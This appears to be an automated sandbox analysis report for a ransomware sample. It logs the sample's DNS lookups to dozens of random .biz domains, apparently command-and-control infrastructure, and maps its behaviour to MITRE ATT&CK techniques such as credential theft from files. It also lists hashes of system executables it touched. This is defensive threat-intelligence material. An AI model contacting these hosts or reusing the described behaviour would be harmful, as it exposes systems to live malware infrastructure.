tnevuluw.biz

DNS Request

tnevuluw.biz

DNS Response

35.164.78.200

DNS Response

35.164.78.200
8.8.8.8:53

pectx.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

pectx.biz

DNS Response

44.213.104.86
8.8.8.8:53

whjovd.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

whjovd.biz

DNS Response

18.141.10.107
8.8.8.8:53

zyiexezl.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

zyiexezl.biz

DNS Response

18.208.156.248
8.8.8.8:53

banwyw.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

112 B
144 B
2
2

DNS Request

banwyw.biz

DNS Request

banwyw.biz

DNS Response

44.221.84.105

DNS Response

44.221.84.105
8.8.8.8:53

muapr.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
117 B
1
1

DNS Request

muapr.biz
8.8.8.8:53

wxgzshna.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

wxgzshna.biz

DNS Response

72.52.178.23
8.8.8.8:53

gjogvvpsf.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

gjogvvpsf.biz

DNS Response

208.100.26.245
8.8.8.8:53

reczwga.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

114 B
146 B
2
2

DNS Request

reczwga.biz

DNS Request

reczwga.biz

DNS Response

44.221.84.105

DNS Response

44.221.84.105
8.8.8.8:53

zrlssa.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

zrlssa.biz

DNS Response

44.221.84.105
8.8.8.8:53

jlqltsjvh.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
75 B
1
1

DNS Request

jlqltsjvh.biz

DNS Response

18.141.10.107
8.8.8.8:53

23.178.52.72.in-addr.arpa

dns

71 B
103 B
1
1

DNS Request

23.178.52.72.in-addr.arpa
8.8.8.8:53

bghjpy.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

bghjpy.biz

DNS Response

34.211.97.45
8.8.8.8:53

damcprvgv.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

118 B
75 B
2
1

DNS Request

damcprvgv.biz

DNS Request

damcprvgv.biz

DNS Response

18.208.156.248
8.8.8.8:53

ocsvqjg.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

ocsvqjg.biz

DNS Response

3.254.94.185
8.8.8.8:53

xyrgy.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

xyrgy.biz

DNS Response

18.208.156.248
8.8.8.8:53

ywffr.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

ywffr.biz

DNS Response

54.244.188.177
8.8.8.8:53

htwqzczce.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

118 B
91 B
2
1

DNS Request

htwqzczce.biz

DNS Request

htwqzczce.biz

DNS Response

172.234.222.138

172.234.222.143
8.8.8.8:53

ecxbwt.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

112 B
144 B
2
2

DNS Request

ecxbwt.biz

DNS Request

ecxbwt.biz

DNS Response

54.244.188.177

DNS Response

54.244.188.177
8.8.8.8:53

uphca.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

uphca.biz

DNS Response

44.221.84.105
8.8.8.8:53

pectx.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

110 B
142 B
2
2

DNS Request

pectx.biz

DNS Request

pectx.biz

DNS Response

44.213.104.86

DNS Response

44.213.104.86
8.8.8.8:53

fjumtfnz.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

fjumtfnz.biz

DNS Response

34.211.97.45
8.8.8.8:53

zyiexezl.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

116 B
148 B
2
2

DNS Request

zyiexezl.biz

DNS Request

zyiexezl.biz

DNS Response

18.208.156.248

DNS Response

18.208.156.248
8.8.8.8:53

hlzfuyy.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

hlzfuyy.biz

DNS Response

34.211.97.45
8.8.8.8:53

banwyw.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

banwyw.biz

DNS Response

44.221.84.105
8.8.8.8:53

muapr.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
117 B
1
1

DNS Request

muapr.biz
8.8.8.8:53

wxgzshna.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

wxgzshna.biz

DNS Response

72.52.178.23
8.8.8.8:53

rffxu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

55 B
71 B
1
1

DNS Request

rffxu.biz

DNS Response

34.246.200.160
8.8.8.8:53

cikivjto.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

58 B
74 B
1
1

DNS Request

cikivjto.biz

DNS Response

44.213.104.86
8.8.8.8:53

zrlssa.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

56 B
72 B
1
1

DNS Request

zrlssa.biz

DNS Response

44.221.84.105
8.8.8.8:53

jlqltsjvh.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

118 B
150 B
2
2

DNS Request

jlqltsjvh.biz

DNS Request

jlqltsjvh.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

qncdaagct.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

118 B
75 B
2
1

DNS Request

qncdaagct.biz

DNS Request

qncdaagct.biz

DNS Response

47.129.31.212
8.8.8.8:53

xyrgy.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

110 B
142 B
2
2

DNS Request

xyrgy.biz

DNS Request

xyrgy.biz

DNS Response

18.208.156.248

DNS Response

18.208.156.248
8.8.8.8:53

htwqzczce.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

59 B
91 B
1
1

DNS Request

htwqzczce.biz

DNS Response

172.234.222.143

172.234.222.138
8.8.8.8:53

shpwbsrw.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

shpwbsrw.biz

DNS Response

13.251.16.150
8.8.8.8:53

kvbjaur.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

114 B
73 B
2
1

DNS Request

kvbjaur.biz

DNS Request

kvbjaur.biz

DNS Response

54.244.188.177
8.8.8.8:53

uphca.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

110 B
142 B
2
2

DNS Request

uphca.biz

DNS Request

uphca.biz

DNS Response

44.221.84.105

DNS Response

44.221.84.105
8.8.8.8:53

cjvgcl.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

cjvgcl.biz

DNS Response

18.208.156.248
8.8.8.8:53

fjumtfnz.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

116 B
148 B
2
2

DNS Request

fjumtfnz.biz

DNS Request

fjumtfnz.biz

DNS Response

34.211.97.45

DNS Response

34.211.97.45
8.8.8.8:53

neazudmrq.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

neazudmrq.biz

DNS Response

44.221.84.105
8.8.8.8:53

pgfsvwx.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

pgfsvwx.biz

DNS Response

18.208.156.248
8.8.8.8:53

hlzfuyy.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

57 B
73 B
1
1

DNS Request

hlzfuyy.biz

DNS Response

34.211.97.45
8.8.8.8:53

aatcwo.biz

dns

alg.exe

112 B
144 B
2
2

DNS Request

aatcwo.biz

DNS Request

aatcwo.biz

DNS Response

47.129.31.212

DNS Response

47.129.31.212
8.8.8.8:53

rffxu.biz

dns

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

110 B
142 B
2
2

DNS Request

rffxu.biz

DNS Request

rffxu.biz

DNS Response

34.246.200.160

DNS Response

34.246.200.160
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe

Filesize
2.2MB

MD5
146e162b912c91c5f08cbefa45e5feaa

SHA1
60e15d8fabd1c1051c52df9cd6279f287cb44078

SHA256
db3dd3a1a5877eca384e0fcaf4953b7e9b3f58d52287e3287d28feb5aef4ee40

SHA512
f9021274d03a7df3c4644aa6e3f3a1c0589cefece79539aa3944b9d2550b36b72453268f1dcf93c5d032878272016d769897cc93fde7203b131eaff948181011

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
789KB

MD5
bc00dd7c69bd55d4a1b8a6cfcd0125a7

SHA1
ffb81c25e90ea5575c584a7a5f77d3ea1346ea2f

SHA256
8bb673bb7c8d42a1a9a753d53afb1097a10eb7e9bc847a5b26d33570b5e5fbae

SHA512
4a8a76515656702b4871137d4342ef0e6cd37091c0c2e11d380788e23730f385549eceb0a3b56029af5612c6fed64d22ec95ad54e5c7645616f917b0d33c2211

Download Submit
C:\Program Files\7-Zip\7z.exe

Filesize
1.1MB

MD5
8d90fde691ce439128a8bbca87ddc4bc

SHA1
f13f8f376dfbeb04e4e27fc407abc26661bbedbb

SHA256
cda1a9cb0cae2455cb8024759ee7aaed9c71902fbeb40ca5ed783bb098694447

SHA512
8a6dbf8bf2ae074f6738f97bc164dc3a7f5a36e3686d457c2ef92c7f54ba714199f0d84b2d5737d32d90b3d890edd41b5c9f404b7b15ba1ebfe901db3e463e76

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
1.5MB

MD5
d6c86650a2674dd722bf9b7b08251f87

SHA1
489ae47116b1570e38418f051143e24f896f462e

SHA256
74993352f08053ec48ef1b3e1d1978917da63e9f791ac04db58c632d4077d9b2

SHA512
72cc9bd3bcb4c0e0b8120104b3a92bcbf8aa846169033731c0c447fb17ab07ed298dbaa9439427e39753596f641e3130719471f665686e67986d58a4d72e1e1a

Download Submit
C:\Program Files\7-Zip\7zG.exe

Filesize
1.2MB

MD5
861f54abdbf807fc5528e12b3e658d6a

SHA1
67f01763ea1a20eb956aabbc023f06224bc3448a

SHA256
b36e764c723151bb9de843c8647b54a7580ed45ea6aff2190b0217525e454361

SHA512
6f35594d8420b3c71d75104ba1f389f29848e746724498a1b201b623d382acea4805d91a0ff4e9711cc9dc2400ccb88dbc6f319a06b8cc405a9b8c921f7c6b38

Download Submit
C:\Program Files\7-Zip\Uninstall.exe

Filesize
582KB

MD5
bc3afb87d03cef67b1093552d0a61f9c

SHA1
1f9303fbf30721f3ac76331039bccae7e5db9cc9

SHA256
26837217b32c5594795b8fd21f09745f0ad8c46bf2fa9a6ba6bf5dc3b2a421a6

SHA512
b5f55f2fff481d7e9ab997234ebc4fdeba86d3c57993651e99a7dbd2347dd0d505ce6e59d13e8c394f37acb7c26cb4b91fbb7849a44943d730a19f0c204bcd2d

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Filesize
840KB

MD5
5cbd6954700b53ea8fa054798d8a60aa

SHA1
5c15622df0798dadeafd3d120cca8d5dd9463171

SHA256
47ab2991f8c4fb485aa224ebc547aaf2c29352ac0982e23e861f62e8f3b90938

SHA512
727f3a20ce385f5f4da737f80818432fad10564d95513d26362605930943f446cc7cf1f0ca383eedd5e67566dca01ae16bd5cccad38534411dedf9c3fde1b5f7

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Filesize
4.6MB

MD5
9008a6ad0547adf8b4a7a692bf894573

SHA1
df881c22f73923a14a673b01e4c8e2982d1b70de

SHA256
24aa53d5dbd2099792705d5a32acd0e6fb6f1c22992888026c437746f8eccde2

SHA512
778788c2662a1499bd1e46c6c72f5464be2d0a6885e0779a340a3552232e851b2326f5f3f60869bde03b1d4946572cff3ee88ea9a47843c13067afe0e583cdf4

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Filesize
910KB

MD5
684fb6f1e5b281478837715719391e12

SHA1
8211b5bcf45c696b2255eaed6840cac8a9541519

SHA256
211d23e2a3ff00325fec25c5acef759a3a4ca7749285d7ef2ad4a961dd661b18

SHA512
987cd108652b8c83a3696640152cb9fa7535fc1a1b7bd3b3efc36d096d8cc43f2d021a7ae39ae2446eaded03c73a8d262948f3502680b416e834bc1aaab46dd0

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Filesize
24.0MB

MD5
fe629b0a7296f5de33ae26bd889ceaa7

SHA1
50960afcbcea4e4a3e28ce6dd57ca202d0c18655

SHA256
255f41ac11dd6aa42c1ce1d917ac3aa1a7cea3b8881ddf699b0943a5fc170d59

SHA512
8c4742ab3b05e76e8471050f4055d0267830061f6e1f946458ae63222e8344f3f8c3edf515e1e7a1c104b8ff558d9307d55a3b6cb2e318d71de86ff09a613493

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Filesize
2.7MB

MD5
e1ce2173654368757b176eb4723b281f

SHA1
3fb499f4e13bfc766139eeec7629e18e2da95599

SHA256
d9f6abdeec7ed274831dbabf189a1d49de60c05c7671b5840ff0294db3a5a4e1

SHA512
c00354938a90813e1cb2f4904b4a70d791929fae1359e9340b916044e54a32dda49cdf4f15d28931bc9fb713230c90b47f725cd4ce00ebedf21ca74ca4315e15

Download Submit
C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE

Filesize
1.1MB

MD5
dbf9e10a112ff13924b344a024b75f23

SHA1
42c561e00208ab849d5a41ce4877524c7fcb31da

SHA256
07df6268e07db37d0f93866d1a1a26b81c3f26add81769681a984ea8aa94877f

SHA512
ca884b414e4ac7afbab6c9d208f2e0b1ea7f6e6c2b864a73b9bac7c70abafc6786ed8c880082a7455fd52a8cd09d0aece6e60879705ff055583086f51bb9e03a

Download Submit
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
805KB

MD5
c130c7928f1aa745974e920239402352

SHA1
d29f95ac892615a2fb6533e6af237f99c0b757a4

SHA256
5e22903bbe417faae33a778a08450c85091b5447860c5f9309dd31c20d59cd95

SHA512
bdc284493c8fef0e27fb7c4e1f4fa6cf9798eb0b19f8e04511d3b963aec945ffd492e1511a73bdd4cdd4a26ccf73309d186526a287dee61c389f56d35844b0b1

Download Submit
C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe

Filesize
656KB

MD5
47eb184704b1d56c6d29a2c773164cd2

SHA1
d5b4f6d5a37bfca9e6b0edd9049b32152c6aacab

SHA256
5e0667a6450e0b08b21f9ff2e197388c49b54f416bc10ed4481fd5801c5f56d2

SHA512
a34160700ef794358cd7cc7c1d466c920b95a87b22ad3782abc03b270ec38c4766326a6dc5d5d63e4f36fabcf73729901cb4a639c0b22acc7d76b489ac413cf3

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe

Filesize
4.6MB

MD5
fc0660855d16eda65071d1ba525e0a05

SHA1
0d0addcf55636f5b0e9b197d595be4cdb0138ca3

SHA256
4419edfea05792ff48eb75306e9d1dc70e24cb689eef1cc389fe6deb0d15b606

SHA512
ac468d05442df7b822600f203234b3bb0cf9b4065ba33d83ff7bf92ba503e025b3ee51c6a1928549f7a90d8152d52dda06962b781623dad02b4c05e0d9456fcb

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe

Filesize
4.6MB

MD5
46cd27b4e1459e5a015768ba503b0021

SHA1
6b550dae8b26037a61173421227ada8ff0671b30

SHA256
b655f842ac1795ae946e2a270bbe6a0b3d698a21a25477e5beb4e96877f69f7e

SHA512
8d1864bb390c2169935795915e8d7f76629f61830e1d4b8fb9f7cebb152f44bb7158dd9141b4b430face64912ea7109aed2ee4efaa1e48fc940e1e25569453c0

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe

Filesize
1.9MB

MD5
dd6683ef3276b74ec6ad48be9fd38afd

SHA1
c2585e3e8170a65793f08f8e1eeb5f94c113c8ac

SHA256
4412ead8e655d6f857cb8fcbfa81adbb9706a6b0384e9c62a08aacdd2fe5b09a

SHA512
b6e5c3ddfa8cb3e35c9ab6a2ca6aa595030c897390b8d0968acdcd00369385a29645b238b471c28478f8700a734c0ccd550a749a629ab91ba11c7952fe239781

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

Filesize
2.1MB

MD5
2c204e84ce50c935231bcc6dfd9092bd

SHA1
fcead0cebe35cb5595362c0b6370eeb7fc2f06a9

SHA256
8ff22ed52b274fd74ee452a69b5054c6e1561db3240691c5cc80afa4d316a865

SHA512
60b59ed6b7699082d16ac8e95383f3951d43b5116368316941e9bd3fcac0bfdc1f20821b5547f4e1ff7853cd6bcbc5fe2ac8ecf889f75e6c21cf45b4d962faaa

Download Submit
C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe

Filesize
1.8MB

MD5
efc455b621f61f67bbff166c8993f5b2

SHA1
053cf58547447abe2a896791462c489098964bce

SHA256
d91a90c1fa3ecafe6be4d99b15793136c5c32280da09763fec7002098ca4b5f0

SHA512
30d7da73e762cb4eb7c5e98e6e73017485670584b34d33841ff6c6625f2bdc7044684ee94a9218fe5845a913f92e3e17a075c2a709139d7afa46be36cd004c46

Download Submit
C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Filesize
1.6MB

MD5
e41a56f6bdee1542ebbf590c7bcb8f90

SHA1
22f1337594e9d804aea8694de4494c30907068d3

SHA256
c231d6b1092b7731a0eaf7e4dff6d5a48319c2f4cd564b21da79d2a6ccceaf80

SHA512
c5e3456426c8dd3159547fd4f8c695e86944970f42450f674a38e01821e0218501c43fe005bf3c0a9930ba09c271d3de0e4e440a1a7912e272704e8720ac44f5

Download Submit
C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe

Filesize
581KB

MD5
6bf9ad85b498e5218537084931b7f5a0

SHA1
62e7ab50d23d3d6eaad2e54be0911a0140cd1178

SHA256
50e9fad8da2987c475f884d98c2d5966dd5e8e55f603efdc2a8827534a158f9f

SHA512
ce09f60eb4b3c466c3a41ed2adc8ca3534f346071f621a8f2717e45e79def6fda81caa9a0ae29b39d02e4f740e6103f9d1db3f43141dd1e8a5278f8eabd77459

Download Submit
C:\Program Files\Java\jdk-1.8\bin\extcheck.exe

Filesize
581KB

MD5
f6713351cd8321be04738b25486198b4

SHA1
f023ffce9858389e47683038da41a3c11c2984c2

SHA256
df3384bcdeb78302c84cf3b4f168a0034e13f9bdbad8b2719df424308a79ec3f

SHA512
8b8621660dd46c1a7e0b1b36d08600e74d0998bd87a2f582ba39c19f55fac5e4eb4e8293e31985e1051053a1a811852c60bfd0fb46e9ed3000a4c736340daa14

Download Submit
C:\Program Files\Java\jdk-1.8\bin\idlj.exe

Filesize
581KB

MD5
1604a4aeef57f7bf8e11baaf0a1598cc

SHA1
19ed857eda5552f8470cc19df3a4c4dc22ed3c18

SHA256
ba7515e957067a2586f8c26d86144b922428b4208216140a6d2f3dbbf4ad39b7

SHA512
b67259025611e71f2771f35245422568481bbf6a608d39c8d149459e8f6d7af2c48d6fb3d38a4c60c41dcbd809901fcc95e104c34980bd0a74ee1870f30fcf66

Download Submit
C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe

Filesize
601KB

MD5
64a4df015de4c6f9e506def0faded181

SHA1
d6fb5ea82dbd232cdc884a757bf23f14d850c933

SHA256
313c243c07e334c9c839060623b4b9cbd2df76048266bc5109082ad76bd766a1

SHA512
0e6172b4db0026d63db57a770deae1636d65332dd9fb542146f9a43646f63d2c80998ba945d5f500c99f6964077276842b596a0b4481134da237f1a8cf537e8b

Download Submit
C:\Program Files\Java\jdk-1.8\bin\jar.exe

Filesize
581KB

MD5
1a517087b2e0f008c68b164935475662

SHA1
6ff46c436f26eebab7ba29201919e7a21159775a

SHA256
8a87318964780cfd8ab8d38c2cfc22b95c23023c79ed9d8e9ac6e4cfc69298d4

SHA512
cf64a20146fe64e2057f8416585c3e353f3c56065830349fc6648b101332d862af33a97233ff99c66e303b3a6454f6a97794c4b26bd3823910896f70c7525cc8

Download Submit
C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe

Filesize
581KB

MD5
f057b9bbf03d4ea9d36293fa3ef67fab

SHA1
62738223f990a743a44ba3dfa763a64ad30de64d

SHA256
4f1c34e6974a2c63294994b9099ef71ad5025a010e20dc0cd1bcce36c1e7ed7f

SHA512
5ded8e800ecf1a49e0de660e610a75f073417eb39270f8f42f77b0009cb1efbabf49b0acff502bda903654277fd339fb1e760bebd59820b7ae33be1a21c23cb1

Download Submit
C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe

Filesize
581KB

MD5
7045f0aef823eb60196b657f6833685a

SHA1
983e3d9f4ba76cacf1ca9898ca8eacab3f064f04

SHA256
a41f4ba30e721b072cb184872d41356b81dcc9a79da4fdf7b9f2fafc1119eb95

SHA512
937064aa0842915007a9fd20d13a57b929e89dc428e021cf0a68997721ecada8f13db34e0117de6238ea0b3b005b8f78821b9263d45ab9c54fdd52c064fde8dc

Download Submit
C:\Program Files\Java\jdk-1.8\bin\java.exe

Filesize
841KB

MD5
f842304fbaf5a06b6056c589c130d5d6

SHA1
2b21bd4b2a093a7a541992f9683b6ad3a8126c40

SHA256
69e4bfd99c20118b063252ea07839b96e076e684f7680328ac687f01cd7626da

SHA512
1ea30d5125f581d213a374e0a505be6844efb485ff8cfbd571f455d807fb3bb7aa6d887a8cc0df0813dc9ea26206ddb14d2ed9491cf99972c0b7deef3a30106a

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javac.exe

Filesize
581KB

MD5
fdf0a0722e51d6c91723f9af4a166df4

SHA1
6ec4a3418966e9856598194ba227b96e2132cba4

SHA256
8baed6eac321a0642f4b7c5c9dd390441c7747b3a5034745058170eb64769eec

SHA512
371c85b259b2c7943fe087e9471059d82b499fa9aa0b4884f682091d93d8aa0e2a439fffcae6c00017d1a3e3ba61b0b66d40552f990843bc62015f09d8dee934

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javadoc.exe

Filesize
581KB

MD5
e8db8add4c479002f25631641cd91b32

SHA1
764e75d3a0a821f991d09ab14c196450e552a847

SHA256
c259775d32a156a8eab78aebef9bcd6f7cb0cd47a2a0711b2157e43e5dc84354

SHA512
5950640e5f5d4e7cfe0548eeb0858e91a55ef296882fc4cba63f943ce2010d05cf81652f60242bb56151a36cdfbafe36412fb0f1db6502987bd364644893ee20

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javah.exe

Filesize
581KB

MD5
97c28c4091c02213540c8d4ec1641edf

SHA1
3ee40f34949e356f458790178d03882636ee8f33

SHA256
710122832c3515586eede053bba3b00555e3294e72a33d7fba1f9e6b555fad18

SHA512
94318fbccd000143a9789c6755816b860aa8458c10ebf003bb74db18cd0baf0a96b0c933fcaf5e3448e898a45cec40d95065c7b8a5bff83f770eec5a4d22a05b

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javap.exe

Filesize
581KB

MD5
ccb8f7822034552f7124c70fd1d334a6

SHA1
c94e4b70207ec39fdbe63bfd89b03215de90b2a4

SHA256
0a8ca74009f6d8945399996bad4b2d7fa9e2057467e9761cbf7a72d2489d6de8

SHA512
00832127f58f572181572a88e708a9b44e015f04238f5a6c5ba8d521eb4856e39239ec17cf0e04d35a17d58a55ec566b52f0836d410870df88ae68e588bdfed9

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javapackager.exe

Filesize
717KB

MD5
63948ca7b003ea9bdb81b1b7d1c9d0c2

SHA1
a20659016f7c475993f869224b97eb4946d7bdde

SHA256
2793f092b458afe41cd67f481f89811bcc0f9d3dea682d0d9957e5c9df58963f

SHA512
16047e5c4cd3675d15433c0c97380ff05e31ee39a87d982f92466df0c3fd1682ab8cd18f0a48dc5eb8ac89cabd96007f56d525d8a8464aae50205741117f528f

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javaw.exe

Filesize
841KB

MD5
8020190faefd97966581f0ffe81edf5a

SHA1
23f11e917ac8ab087c875fef2c3632434862cf95

SHA256
afede0ca3f6ce7ed5a9fef76eb908a473946a913383cc25c1b982351a9bac0a3

SHA512
b37e90bae68fc1ae00352cccdf31e801af159916615be8f2f6bb2bf4b42f535c40c9275f93e178ee012635d09a712821ea77425422eaeb4be549a30ac532d341

Download Submit
C:\Program Files\Java\jdk-1.8\bin\javaws.exe

Filesize
1020KB

MD5
844f116e5da93fcde5718dcf2baa2fc2

SHA1
0ecb8671d715bf0c4d0a70506b1c93925afea90d

SHA256
4bd77997373493240b48228e887fc22d8cfeb82e781cce1128f4e400ddc7c2ee

SHA512
243f9f002c952d3ac21bbf4fca21347f4cbf55e746a2a133cf02d799d0192dacb8fbba9f2488a54fd7622ca5ac90c73ff5e4f7cbd3771e536e2f70b7c8feda88

Download Submit
C:\Program Files\Windows Media Player\wmpnetwk.exe

Filesize
1.5MB

MD5
ceae022b7397f65f8c6f4ddda469584a

SHA1
6a6f512b30678b54b5dac1a04060249526dec426

SHA256
1671dcbe4effa1421fef717ffc86d98637eb729a48aa5a1d814e751d3843583e

SHA512
01cfc978193952fce786689c5d3ae2d04ab8bd66978ce17ae03fbbe06e27890033517be1ae408a08ed8683ab405f91bb3ac8f5fb215e9b8201a64df98a45105f

Download Submit
C:\Program Files\dotnet\dotnet.exe

Filesize
701KB

MD5
cf2f2a1e420eaedda11951d1e8d8ebe0

SHA1
d78ba420fe2c866bb8055f6ae66fa4f2d80db865

SHA256
2728bd8e00302c2499dc2742c6d0b9d4b28598575bd27775e79c7eedd0704fb4

SHA512
c480ed17de364996238f5592ed01750dbfb06fd93af39cb2dd84fdc06661c68876f12c435bead0ca9696e036e42bc4d4b9cdd105ac8a65595488679a620b5940

Download Submit
C:\Windows\SysWOW64\perfhost.exe

Filesize
588KB

MD5
4d00bb86a1fc8e9a2fcb06d6ec2c2ad2

SHA1
b5e8a5e1f059ca78bf502099ac4486800a4010da

SHA256
24e0cf50cd4b1614b840296a2d733b81952581dfc333c0e8f9668de616d9c637

SHA512
e184c04d288b485e6bc917dcdc60a73547da0a33798e917c99f15e92eaa39c39ef279cbb4f1447e4f65374da6d1aa31c633536ff00870991005cda0302864294

Download Submit
C:\Windows\System32\AgentService.exe

Filesize
1.7MB

MD5
67ad75cc7a738baf4d62d901d9949294

SHA1
f036fc024b6acbd747188d5aa7ba90c2fde8528e

SHA256
bd2a3e5dd27243db1e092695f2992d1dc52c111caf6bce18f08fae0ad972e621

SHA512
d0815e4f4167f674f0be99796143c0f1658d41e5bbd667f04615020f74353a681ae4fc06c5433ecfdd0514a66ee6859e03b3f109c68dca6fbfb591ba45afe47d

Download Submit
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Filesize
659KB

MD5
8f68dcba8081a8b04be6c11ec024204f

SHA1
04fd87f924a1ac4c2b1f3f4a1eb35e5578143bb8

SHA256
23c805493e043b3774301365e4f02406c193b65c13a93d700e79d79abd57d8d5

SHA512
82df4ade37c3c018fb5f0ec50fb4c0e881616d60e0a7a70b190f548ae6c60993190a93221275b8221785ee317d87a2ffdbdca9d1c883218162c1e878b1a78de1

Download Submit
C:\Windows\System32\FXSSVC.exe

Filesize
1.2MB

MD5
420bd9bb00809001e2813e39a97c181e

SHA1
bf2f498943580ee8bc8a652d03145858a16e18de

SHA256
b4c00e727d9884f36442e54b3b3ddc6a1f9c25ed3cb16e46cfbacebe24cf00fb

SHA512
6647580c360ef297e78d11438e6789ab7792a85fcf6a9ecd5bb646dea5de7237779df7dee5db033d237d172a1e9d28054ef4398790016b80d647b70bcbb26418

Download Submit
C:\Windows\System32\Locator.exe

Filesize
578KB

MD5
8dddb38cd132d9b1ec73e4d5a2c2a30d

SHA1
2925d6f3b79758814ef04ee38e870df3fd914355

SHA256
